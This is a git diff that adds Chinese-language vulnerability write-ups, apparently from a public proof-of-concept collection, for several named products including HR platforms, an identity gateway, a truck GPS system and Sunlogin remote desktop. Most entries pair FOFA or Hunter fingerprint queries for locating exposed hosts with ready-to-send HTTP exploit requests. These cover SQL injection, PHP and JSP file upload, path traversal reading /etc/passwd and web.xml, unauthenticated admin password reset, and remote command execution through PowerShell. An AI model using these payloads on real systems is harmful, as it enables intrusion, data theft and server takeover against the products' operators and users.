+![1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e.png](./img/KFOD6d47fNNCV5ke/1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e-955380.png) + +获取命令执行结果 + +```java +GET /sslvpn/ceshi.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701762342384-224cbced-19ed-428d-b26d-9957865251d2.png](./img/KFOD6d47fNNCV5ke/1701762342384-224cbced-19ed-428d-b26d-9957865251d2-247511.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hypcbmrskmt1pm4v> \ No newline at end of file diff --git a/卡号极团管理系统order存在SQL注入漏洞.md b/卡号极团管理系统order存在SQL注入漏洞.md new file mode 100644 index 0000000..a542699 --- /dev/null +++ b/卡号极团管理系统order存在SQL注入漏洞.md 
@@ -0,0 +1,44 @@ +# 卡号极团管理系统order存在SQL注入漏洞 + +# 一、漏洞简介 +号卡极团分销商城管理系统,同步对接多平台,同步订单信息,支持敢探号一键上架,卡号极团管理系统order存在SQL注入漏洞,攻击者获取数据库权限。 + +# 二、影响版本 ++ 卡号极团管理系统 + +# 三、资产测绘 ++ fofa`icon_hash="-795291075"` ++ 特征 + +![1711762130074-1574a63a-86db-476c-88d8-f1d859f412c0.png](./img/7J6w5NhjMVIoid6V/1711762130074-1574a63a-86db-476c-88d8-f1d859f412c0-525058.png) + +# 四、漏洞复现 +```plain +GET /order/index.php?pid=1%27+AND+GTID_SUBSET%28CONCAT%280x716a6a7171%2C%28SELECT+%28ELT%287046%3D7046%2C1%29%29%29%2C0x7162786b71%29%2C7046%29--+NqPh HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1711762221617-14382173-fac1-45b1-ac64-300c146f1395.png](./img/7J6w5NhjMVIoid6V/1711762221617-14382173-fac1-45b1-ac64-300c146f1395-376665.png) + +```plain +qjjqq1qbxkq +``` + +sqlmap + +```plain +/order/index.php?pid=1 +``` + +![1711762244256-31d1262f-b6a1-4266-996a-eda7e00394c0.png](./img/7J6w5NhjMVIoid6V/1711762244256-31d1262f-b6a1-4266-996a-eda7e00394c0-456337.png) + + + +> 更新: 2024-04-20 22:27:26 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yyyq138u9iev4ton> \ No newline at end of file diff --git a/卡号极团管理系统ue_serve存在任意文件上传漏洞.md b/卡号极团管理系统ue_serve存在任意文件上传漏洞.md new file mode 100644 index 0000000..f7d172e --- /dev/null +++ b/卡号极团管理系统ue_serve存在任意文件上传漏洞.md 
@@ -0,0 +1,58 @@ +# 卡号极团管理系统ue_serve存在任意文件上传漏洞 + +# 一、漏洞简介 +号卡极团分销商城管理系统,同步对接多平台,同步订单信息,支持敢探号一键上架,卡号极团管理系统ue_serve存在任意文件上传漏洞,攻击者可通过该漏洞或服服务器权限。 + +# 二、影响版本 ++ 卡号极团管理系统 + +# 三、资产测绘 ++ fofa`icon_hash="-795291075"` ++ 特征 + +![1711762130074-1574a63a-86db-476c-88d8-f1d859f412c0.png](./img/vE7SHz5kAueo53Jl/1711762130074-1574a63a-86db-476c-88d8-f1d859f412c0-730376.png) + +# 四、漏洞复现 +```plain +POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/2 +Host: +Cookie: PHPSESSID=ecq4ucplk5n6e3ipihvktl103r +Sec-Ch-Ua: "Not;A=Brand";v="99", "Chromium";v="106" +Sec-Ch-Ua-Platform: "Windows" +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylkv1kpsZgzw2WC03 +Accept: */* +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Content-Length: 301 + +------WebKitFormBoundarylkv1kpsZgzw2WC03 +Content-Disposition: form-data; name="name" + +raw.php +------WebKitFormBoundarylkv1kpsZgzw2WC03 +Content-Disposition: form-data; name="upfile"; filename="raw.php" +Content-Type: image/jpeg + +<?php phpinfo();?> +------WebKitFormBoundarylkv1kpsZgzw2WC03-- +``` + +![1712065231240-c9736a70-517f-4255-8633-f9009bf48946.png](./img/vE7SHz5kAueo53Jl/1712065231240-c9736a70-517f-4255-8633-f9009bf48946-125755.png) + +上传文件位置 + +```plain +/upload/660c0ab3990c5_raw.php +``` + +![1712065262859-951af1ab-d863-45f4-894b-cea341168ea8.png](./img/vE7SHz5kAueo53Jl/1712065262859-951af1ab-d863-45f4-894b-cea341168ea8-520550.png) + + + +> 更新: 2024-04-20 22:27:26 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zl0fb1pz9uc16fmg> \ No newline at end of file diff --git a/卡车卫星定位系统存在密码重置漏洞.md b/卡车卫星定位系统存在密码重置漏洞.md new file mode 100644 index 0000000..2809ddc --- /dev/null +++ b/卡车卫星定位系统存在密码重置漏洞.md 
@@ -0,0 +1,58 @@ +# 卡车卫星定位系统存在密码重置漏洞 + +# 一、漏洞简介 +卡车卫星定位系统是一种基于卫星通信和导航技术的系统,用于对卡车的位置进行精确测定。该系统主要由一组卫星、地面控制站和接收器组成。通过测量卫星信号的传播时间,可以确定接收器(即卡车上的定位设备)所在的位置。卡车卫星定位系统存在密码重置漏洞,攻击者可通过该漏洞重置管理员密码获取应用系统权限。 + +# 二、影响版本 ++ 卡车卫星定位系统 + +# 三、资产测绘 ++ fofa`icon_hash="1553867732"` ++ 特征 + +![1714194591684-b20fda2d-1290-42b3-ba42-1bb3e9b8eaec.png](./img/DjYibcHeiH4_N4z4/1714194591684-b20fda2d-1290-42b3-ba42-1bb3e9b8eaec-649467.png) + +# 四、漏洞复现 +未授权获取用户信息 + +```plain +GET /user/1 HTTP/1.1 +Host: +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![1714195256538-1777c084-e8eb-4a42-80dd-369a3f818ad0.png](./img/DjYibcHeiH4_N4z4/1714195256538-1777c084-e8eb-4a42-80dd-369a3f818ad0-321446.png) + +未授权重置用户密码 + +```plain +POST /user/create HTTP/1.1 +Host: +Content-Length: 216 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: wcms5c={%22L%22:%22en-US%22%2C%22V%22:%226.0.0.0%22%2C%22HP%22:8090%2C%22FP%22:[12060%2C12061%2C12062%2C12063]%2C%22TP%22:17891%2C%22RP%22:3113} +Connection: close + +account=admin&id=1&password=test12345&passwordRepeat=test12345&groupName=111&roleid=5&validend=&phone=&email=&chncount=36&flowType=1&oldFlowType=&flowVal=&flowAlarmVal=&oldFlowAlarmVal=&logContent=111&guid=222&token= +``` + +![1714194616666-3310af30-e319-4b92-9a19-f891d4ab050c.png](./img/DjYibcHeiH4_N4z4/1714194616666-3310af30-e319-4b92-9a19-f891d4ab050c-438896.png) + +使用`admin/test123456`成功登录系统 + 
+![1714194646386-33e08fee-38dc-404f-8ac2-f2a187dd3eb6.png](./img/DjYibcHeiH4_N4z4/1714194646386-33e08fee-38dc-404f-8ac2-f2a187dd3eb6-835533.png) + + + +> 更新: 2024-04-28 16:14:27 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ftoyh91uh1l7p5yz> \ No newline at end of file diff --git a/可视化融合指挥调度平台uploadImg存在任意文件上传漏洞.md b/可视化融合指挥调度平台uploadImg存在任意文件上传漏洞.md new file mode 100644 index 0000000..fc840b6 --- /dev/null +++ b/可视化融合指挥调度平台uploadImg存在任意文件上传漏洞.md 
@@ -0,0 +1,53 @@ +# 可视化融合指挥调度平台uploadImg存在任意文件上传漏洞 + +# 一、漏洞简介 +可视化融合指挥调度平台以标准SIP协议为核心,提供强大的调度、广播、视频、报警、预案、电子地图等功能模块,可实现多级架构管理,满足不同行业调度需求。可视化融合指挥调度平台 uploadImg 接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传恶意后门文件,导致服务器权限被控。 + +# 二、影响版本 ++ 可视化融合指挥调度平台 + +# 三、资产测绘 ++ fofa`body="base/searchInfoWindow_min.css"` ++ 特征 + +![1712505801249-3dd9f411-b3c7-493b-af07-29fd9e07b090.png](./img/_XdfGiCW7VD3y65_/1712505801249-3dd9f411-b3c7-493b-af07-29fd9e07b090-227344.png) + +# 四、漏洞复现 +```plain +POST /dispatch/layuiIm/uploadImg HTTP/1.1 +Host: +Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7ctER307B0RaQwOp +Content-Length: 151 + +------WebKitFormBoundary7ctER307B0RaQwOp +Content-Disposition: form-data; name="file";filename="1.jsp" + +1 +------WebKitFormBoundary7ctER307B0RaQwOp-- +``` + +![1713789052420-7e9a2d81-065b-4060-ac9e-7199dc69b680.png](./img/_XdfGiCW7VD3y65_/1713789052420-7e9a2d81-065b-4060-ac9e-7199dc69b680-543057.png) + +```plain +/media/png/2024/4/22/1713787261034.jsp +``` + +![1713789069296-23477b7b-48af-4956-ab92-aa404dc58516.png](./img/_XdfGiCW7VD3y65_/1713789069296-23477b7b-48af-4956-ab92-aa404dc58516-570969.png) + + + +> 更新: 2024-04-22 20:32:03 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bya2i7xgu6phi6t0> \ No newline at end of file diff --git a/吉大正元身份认证网关downTools任意文件读取漏洞.md b/吉大正元身份认证网关downTools任意文件读取漏洞.md new file mode 100644 index 0000000..57a0344 --- /dev/null 
+++ b/吉大正元身份认证网关downTools任意文件读取漏洞.md @@ -0,0 +1,23 @@ +# 吉大正元身份认证网关downTools任意文件读取漏洞 + +吉大正元身份认证网关 downTools 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件。 + +## fofa + +```javascript +body="/jit_pnx_portal/" || header="server: jit_pnxcore1 web service" || title="吉大正元身份认证网关" +``` + +## poc + +```javascript +GET /jit_pnx_portal/downTools?fileName=../../../../../../../../../etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 +Connection: close +``` + +![image-20241101194808396](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011948455.png) \ No newline at end of file diff --git a/吉大正元身份认证网关downtools存在任意文件读取漏洞.md b/吉大正元身份认证网关downtools存在任意文件读取漏洞.md new file mode 100644 index 0000000..2a08742 --- /dev/null +++ b/吉大正元身份认证网关downtools存在任意文件读取漏洞.md 
@@ -0,0 +1,43 @@ +# 吉大正元身份认证网关downtools存在任意文件读取漏洞 + +# 一、漏洞简介 + 吉大正元身份认证网关是提供内部网络的接入控制以及对接入用户进行强身份认证和审计服务的产品,解决用户使用应用系统时涉及的身份验证、信息保密、权限控制等安全问题。吉大正元身份认证网关downtools存在任意文件读取漏洞。 + +# 二、影响版本 ++ 吉大正元身份认证网关 + +# 三、资产测绘 ++ fofa`title="吉大正元身份认证网关"` ++ 特征 + +![1729778241492-237326e1-b7f2-4329-9dec-df7fe40950e9.png](./img/XSH04fQGxTAZEfhK/1729778241492-237326e1-b7f2-4329-9dec-df7fe40950e9-065463.png) + +# 四 、漏洞复现 +```java +GET /jit_pnx_portal/downTools?fileName=../../../../../../../../../etc/passwd HTTP/1.1 +Host: +Accept: */* +Accept-Encoding: gzip, deflate +Connection: close +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +``` + +![1729778389306-85ec46c0-c9fc-4e67-8427-ad027b4d4f80.png](./img/XSH04fQGxTAZEfhK/1729778389306-85ec46c0-c9fc-4e67-8427-ad027b4d4f80-870916.png) + +```java +GET /jit_pnx_portal/downTools?fileName=../../../../../../../../../home/gateway/src/main/webapp/WEB-INF/web.xml HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 +Accept-Encoding: gzip, deflate +Cache-Control: no-cache +X-Requested-With: XMLHttpRequest +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +``` + +![1729781375496-d3cb2e1b-69b0-4c2b-999e-ba4fb38cf9da.png](./img/XSH04fQGxTAZEfhK/1729781375496-d3cb2e1b-69b0-4c2b-999e-ba4fb38cf9da-716840.png) + + + +> 更新: 2024-11-27 10:04:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ercgu609qmwqlr09> \ No newline at end of file diff --git a/吉林医药系统Login存在SQL注入漏洞.md b/吉林医药系统Login存在SQL注入漏洞.md new file mode 100644 index 0000000..49d1194 --- /dev/null +++ b/吉林医药系统Login存在SQL注入漏洞.md 
@@ -0,0 +1,54 @@ +# 吉林医药系统Login存在SQL注入漏洞 + +# 一、漏洞简介 +医药系统Login存在SQL注入漏洞 + +# 二、影响版本 ++ 吉林医药系统 + +# 三、资产测绘 ++ fofa`icon_hash="775044030"` + +![1724330903965-56cc3f08-d8bd-45f0-ac8f-6ae92352d620.png](./img/KEXhPOOk2pxIcq1S/1724330903965-56cc3f08-d8bd-45f0-ac8f-6ae92352d620-535626.png) + +# 四、漏洞复现 +```plain +POST /Login.aspx HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +Cookie: ASP.NET_SessionId=ojsdqzhri20qo0zd3zkonnpx +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Content-Length: 293 + +__VIEWSTATE=%2FwEPDwUKLTY0OTc3MzY5OA8WAh4TVmFsaWRhdGVSZXF1ZXN0TW9kZQIBFgICAw9kFgICBA8WAh4JaW5uZXJodG1sBSHlkInmnpfnnIHogZrliJvljLvoja%2FmnInpmZDlhazlj7hkZFiU%2FDEzLkPCmDf498pGBLrtD3FC5XsVsdyX0eaNHaa1&tbUser=admin%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&tbPassword=admin&btnLogin=+%B5%C7+%C2%BC+&hfSubmit=&__VIEWSTATEGENERATOR=C2EE9ABB +``` + +![1724331068388-6394ab7c-0ff5-4116-bf1d-b1bf0327cf5a.png](./img/KEXhPOOk2pxIcq1S/1724331068388-6394ab7c-0ff5-4116-bf1d-b1bf0327cf5a-499230.png) + +```plain +POST /Login.aspx HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +Cookie: ASP.NET_SessionId=ojsdqzhri20qo0zd3zkonnpx +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Content-Length: 293 + 
+__VIEWSTATE=%2FwEPDwUKLTY0OTc3MzY5OA8WAh4TVmFsaWRhdGVSZXF1ZXN0TW9kZQIBFgICAw9kFgICBA8WAh4JaW5uZXJodG1sBSHlkInmnpfnnIHogZrliJvljLvoja%2FmnInpmZDlhazlj7hkZFiU%2FDEzLkPCmDf498pGBLrtD3FC5XsVsdyX0eaNHaa1&tbUser=admin&tbPassword=admin&btnLogin=+%B5%C7+%C2%BC+&hfSubmit=&__VIEWSTATEGENERATOR=C2EE9ABB +``` + +![1724330958589-25328917-1401-44eb-aaf4-b477d14cd9c8.png](./img/KEXhPOOk2pxIcq1S/1724330958589-25328917-1401-44eb-aaf4-b477d14cd9c8-895217.png) + + + +> 更新: 2024-11-27 10:01:46 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gsfq16xdvbag4hu6> \ No newline at end of file diff --git a/同享人力管理管理平台ActiveXConnector.asmx信息泄露漏洞.md b/同享人力管理管理平台ActiveXConnector.asmx信息泄露漏洞.md new file mode 100644 index 0000000..4b58207 --- /dev/null +++ b/同享人力管理管理平台ActiveXConnector.asmx信息泄露漏洞.md @@ -0,0 +1,40 @@ +# 同享人力管理管理平台ActiveXConnector.asmx信息泄露漏洞 + +同享TXEHR V15人力管理平台的Assistant/Default.aspx接口存在敏感信息泄露漏洞。 + +## fofa + +```yaml +body="/Assistant/Default.aspx" +``` + +## poc + +```java +POST /Service/ActiveXConnector.asmx HTTP/1.1 +Host: ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Upgrade-Insecure-Requests: 1 +Priority: u=0, i +Content-Type: text/xml;charset=UTF-8 +Content-Length: 224 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> + <soapenv:Header/> + <soapenv:Body> + <tem:GetActivexConnector/> + </soapenv:Body> +</soapenv:Envelope> +``` + +![image-20241129102019535](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411291020719.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/iNp5vADT3y05icdZrmNX9Q diff --git a/同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md b/同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md new file mode 100644 index 0000000..d4fcaef --- /dev/null 
+++ b/同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md @@ -0,0 +1,25 @@ +# 同享人力管理管理平台SFZService.asmx存在SQL注入漏洞 + +同享TXEHR人力管理管理平台SFZService.asmx存在SQL注入漏洞,攻击者可获取数据库敏感信息。 + +## fofa + +```yaml +body="/Assistant/Default.aspx" +``` + +## poc + +```java +POST /Service/SFZService.asmx +HOST: +SOAPAction: http://tempuri.org/GetEmployeeBySFZ +Content-Type: text/xml;charset=UTF-8 + +<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\ + \ xmlns:tem=\"http://tempuri.org/\">\n <soapenv:Header/>\n <soapenv:Body>\n\ + \ <tem:GetEmployeeBySFZ>\n <!--type: string-->\n <tem:strSFZ>1'\ + \ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(81)+CHAR(78)+CHAR(79)+CHAR(122)+CHAR(106)+CHAR(69)+CHAR(103)+CHAR(80)+CHAR(87)+CHAR(89)+CHAR(117)+CHAR(97)+CHAR(104)+CHAR(105)+CHAR(74)+CHAR(109)+CHAR(80)+CHAR(68)+CHAR(74)+CHAR(98)+CHAR(122)+CHAR(99)+CHAR(103)+CHAR(90)+CHAR(68)+CHAR(105)+CHAR(114)+CHAR(107)+CHAR(69)+CHAR(86)+CHAR(121)+CHAR(76)+CHAR(69)+CHAR(115)+CHAR(102)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(101)+CHAR(74)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\ + \ hExp</tem:strSFZ>\n </tem:GetEmployeeBySFZ>\n </soapenv:Body>\n</soapenv:Envelope> +``` + 
diff --git a/同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞.md b/同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞.md new file mode 100644 index 0000000..2e47eda --- /dev/null +++ b/同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞.md @@ -0,0 +1,21 @@ +# 同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞 + +同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 + +## fofa + +```javascript +body="loginAction.struts?actionType=blockLogin" +``` + +## poc + +```java +GET /jsp/oa/app/webservice/tooneAssistant/tooneAssistantAttachement.jsp?filename=./../../../../../WEB-INF/web.xml HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537 +Accept-Encoding: gzip +Connection: close +``` + +![image-20241012131723974](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121317035.png) \ No newline at end of file diff --git a/同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞.md b/同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞.md new file mode 100644 index 0000000..f6ab96a --- /dev/null +++ b/同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞.md @@ -0,0 +1,25 @@ +# 同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞 + +同鑫eHR人力资源管理系统 GetFlowDropDownListItems 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa + +```javascript +body="/TX.CDN" +``` + +## poc + +```javascript +POST /Common/GetFlowDropDownListItems HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +Content-Type: application/x-www-form-urlencoded; charset=utf-8 + +FixedFormCode=1%27%20UNION%20ALL%20SELECT%20NULL%2C@@VERSION-- +``` + 
diff --git a/向日葵远程代码执行漏洞(CNVD-2022-10270).md b/向日葵远程代码执行漏洞(CNVD-2022-10270).md new file mode 100644 index 0000000..2e79fdf --- /dev/null +++ b/向日葵远程代码执行漏洞(CNVD-2022-10270).md @@ -0,0 +1,34 @@ +# 向日葵远程代码执行漏洞(CNVD-2022-10270) + +## 漏洞描述 +向日葵通过发送特定的请求获取CID后,可调用 check接口实现远程命令执行,导致服务器权限被获取。 + +## 影响版本 ++ 向日葵个人版 for Windows <=11.0.0.33162版本 ++ 向日葵简约版 <= V1.0.1.43315(2021.12) + +## 漏洞复现 +向日葵开启后会默认在`4000-65535`之间开启某个端口 + +![1679820583875-6d7b4e9b-5387-4cf5-a2e6-88ddcde3bacd.png](./img/gUlc0BSsVT6Iv0WU/1679820583875-6d7b4e9b-5387-4cf5-a2e6-88ddcde3bacd-830006.png) + +发送请求获取CID + +```java +/cgi-bin/rpc?action=verify-haras +``` + +![1679820640646-5c60754e-fc3f-407f-9f0f-882daffc1ac8.png](./img/gUlc0BSsVT6Iv0WU/1679820640646-5c60754e-fc3f-407f-9f0f-882daffc1ac8-757223.png) + +使用获取到的 verify_string 作为 cookie的 CID字段,进行命令执行 + +```java +/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig +``` + +![1679820683541-36b5acf8-87ff-466c-aa76-1b3ea94f802c.png](./img/gUlc0BSsVT6Iv0WU/1679820683541-36b5acf8-87ff-466c-aa76-1b3ea94f802c-023495.png) + + + +> 更新: 2024-02-29 23:58:31 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/re22tknn48ckod6v> \ No newline at end of file diff --git a/启明星辰4A统一安全管控平台getMaster.do信息泄漏.md b/启明星辰4A统一安全管控平台getMaster.do信息泄漏.md new file mode 100644 index 0000000..c94069d --- /dev/null +++ b/启明星辰4A统一安全管控平台getMaster.do信息泄漏.md 
@@ -0,0 +1,41 @@ +# 启明星辰4A统一安全管控平台 getMaster.do 信息泄漏 + +# 一、漏洞简介 +启明星辰4A统一安全管控平台实现对自然人、资源、资源账号的集中管理,建立“自然人账号-资源-资源账号”对应关系,实现自然人对资源的统一授权,同时,对授权人员的运维操作进行记录、分析、展现,做到作事前规划预防、事中实时监控、违规行为响应、事后合规报告、事故追踪回放,加强内部业务操作行为监管,实现日常运维和业务使用可视、可控、可信,完善安全管理体系。启明星辰4A统一安全管控平台 getMaster.do 存在信息泄漏漏洞。 + +# 二、影响版本 ++ 启明星辰4A统一安全管控平台 + +# 三、资产测绘 ++ hunter`web.icon=="fcae06c9415a39c361780b5c0e46ab89"&&web.title="4A"` + +![1692348117528-970daf0c-24ec-4ed7-beef-dba36540eaaf.png](./img/HqxRRRRxVqMc1zm1/1692348117528-970daf0c-24ec-4ed7-beef-dba36540eaaf-235288.png) + ++ 登录页面 + +![1692348142456-80423dc9-2684-4379-9606-d4c1a8468b6a.png](./img/HqxRRRRxVqMc1zm1/1692348142456-80423dc9-2684-4379-9606-d4c1a8468b6a-202217.png) + +# 四、漏洞复现 +```plain +GET /accountApi/getMaster.do HTTP/2 +Host: xx.xx.xx.xx +Cookie: sid=7a5fa1f8-5025-4d3b-9101-26d9db5b2ce0 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1692348257648-bcf13672-a23c-48c9-aa25-d55608875db4.png](./img/HqxRRRRxVqMc1zm1/1692348257648-bcf13672-a23c-48c9-aa25-d55608875db4-075599.png) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: 